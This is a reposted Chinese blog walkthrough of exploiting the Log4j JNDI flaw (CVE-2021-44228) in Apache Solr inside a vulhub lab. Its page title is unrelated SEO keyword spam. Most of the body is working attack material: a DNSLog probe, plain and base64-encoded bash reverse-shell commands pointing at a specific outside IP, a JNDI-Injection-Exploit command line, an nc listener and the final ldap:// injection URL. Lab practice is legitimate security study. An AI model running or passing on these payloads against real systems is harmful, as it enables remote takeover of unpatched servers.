您的位置:首页 > 娱乐 > 八卦 > crm管理系统在线使用_网上银行入口_中国十大新闻网站排名_北京优化seo排名优化

crm管理系统在线使用_网上银行入口_中国十大新闻网站排名_北京优化seo排名优化

2024/12/25 21:04:41 来源:https://blog.csdn.net/2301_79848048/article/details/144703050  浏览:    关键词:crm管理系统在线使用_网上银行入口_中国十大新闻网站排名_北京优化seo排名优化
crm管理系统在线使用_网上银行入口_中国十大新闻网站排名_北京优化seo排名优化
第一步:搭建靶场环境
#开启环境
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d

来到网站首页

第二步:搭建一个dnslog平台上获取我们注入的效果

第三步:发现 /solr/admin/cores?action= 这里有个参数可以传

我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的 版本号

/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.kq25rl.dnslog.cn}

第四步:开始反弹shell
#需要用到一个工具JNDI-Injection-Exploit
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
#安装java
yum install java
#反弹shell
bash -i >& /dev/tcp/[IP]/[端口] 0>&1
bash -i >& /dev/tcp/8.155.7.133/8888 0>&1
#反弹shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=
#命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c
{echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A [你的vpsip]
#最终命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS43LjEzMy84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "8.155.7.133"
#注释
-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。

第五步:进行JNDI注入
#新建终端并开启服务器监听
nc -lvvp 8888

第六步:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址
/solr/admin/cores?action=${jndi:ldap://8.155.7.133:1389/1niv1a}
${jndi:ldap://8.155.7.133:1389/1niv1a}

看到已经访问进来了

去监听端口的页面成功反弹Shell

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com